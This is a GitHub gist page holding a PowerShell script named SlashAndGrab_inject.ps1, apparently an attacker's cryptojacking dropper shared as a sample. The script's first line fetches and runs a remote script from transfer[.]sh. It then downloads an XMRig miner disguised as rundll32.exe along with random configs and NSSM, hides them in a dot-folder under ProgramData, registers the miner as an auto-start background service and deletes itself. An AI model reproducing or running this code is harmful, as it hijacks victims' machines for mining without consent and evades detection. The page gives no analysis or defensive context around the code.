Skip to content

Instantly share code, notes, and snippets.

@Purp1eW0lf

Purp1eW0lf/SlashAndGrab_inject.ps1

Created February 23, 2024 16:35
Show Gist options
  • Save Purp1eW0lf/2346dd2b012a525e5bb0ed62b7eccef7 to your computer and use it in GitHub Desktop.
Save Purp1eW0lf/2346dd2b012a525e5bb0ed62b7eccef7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
SlashAndGrab_inject.ps1
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"
# Check for Administrator rights
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
Write-Host 'Please Run as Administrator!' -ForegroundColor Red
Exit
}
# Check and return current user name
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
$dircheck = 'C:\ProgramData\.logstxt'
#$filcheck = 'C:\path\to\xmrig.service' # You might need to adjust this, Windows doesn't have an equivalent to systemd
$filcheck = 'C:\Users\$currentUserName\rundll32.exe'
# Removal functions
if (Test-Path $dircheck) {
Remove-Item -Recurse -Force $dircheck
}
if (Test-Path $filcheck) {
Remove-Item -Force $filcheck
}
# Download files, I am using ngrok as port forwarding for my containers to FTP server
$listi = 'https://transfer.sh/UFQTwgYszH/config14.json','https://transfer.sh/ATVMNG5Pbu/config13.json','https://transfer.sh/s27p8BcTxi/config12.json','https://transfer.sh/ojw6aKoA4A/config11.json','https://transfer.sh/lyEkHLGt03/config10.json','https://transfer.sh/8l4d5qR39o/config9.json','https://transfer.sh/xkIMWnocQH/config8.json','https://transfer.sh/Db5eUfqKP9/config7.json','https://transfer.sh/L1e30KShXP/config6.json','https://transfer.sh/w2Y0iuEKiY/config5.json','https://transfer.sh/6bkwRh4NXd/config4.json','https://transfer.sh/PRBRzMMEKC/config3.json','https://transfer.sh/RWSn6NLIr7/config2.json','https://transfer.sh/MRFibhy8fS/config1.json','https://transfer.sh/FeDRSFU5XV/config.json'
$randconf = Get-Random -InputObject $listi
Invoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config.json'
Invoke-WebRequest -Uri 'https://transfer.sh/ePlTBkDtz2/rundll32.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig.exe'
Invoke-WebRequest -Uri 'https://transfer.sh/CrNx3LVEgY/nssm.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm.exe'
# Create xmrig service file (assuming this has an equivalent in Windows)
# TODO: Check if you need an actual service wrapper like NSSM
# Get thread count (using CPU count as a basic substitute for now)
$threads = (Get-WmiObject -Class Win32_ComputerSystem).NumberOfLogicalProcessors
$tf = [math]::Round(25 * $threads)
# Move and setup files
if (-not (Test-Path $dircheck)) {
New-Item -ItemType Directory -Path $dircheck
}
Move-Item rundll32.exe $dircheck
Move-Item config.json $dircheck
Move-Item nssm.exe $dircheck
# Move-Item xmrig.service C:\path\to\services\folder # Adjust path and use only if required
# TODO: Setup as a Windows service (consider tools like NSSM or `sc` command)
#create a nssm command that will make the xmrig.exe run as a service in the background
Set-Location $dircheck
.\nssm install xmrig 'C:\ProgramData\.logstxt\rundll32.exe'
.\nssm set xmrig AppDirectory 'C:\ProgramData\.logstxt'
.\nssm set xmrig AppParameters 'rundll32.exe -B -c config.json' # -B = run the miner in the background
# Start the service
.\nssm start xmrig
#make the xmrig service run on startup
.\nssm set xmrig start SERVICE_AUTO_START
#make the xmrig write in a log file
.\nssm set xmrig AppNoConsole 1
#make the xmrig run in the background
.\nssm set xmrig Type SERVICE_WIN32_OWN_PROCESS
# TODO: Windows doesn't have an equivalent to sysctl or hugepages in the same sense as Linux
# Clean up
Remove-Item $PSCommandPath -Force
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment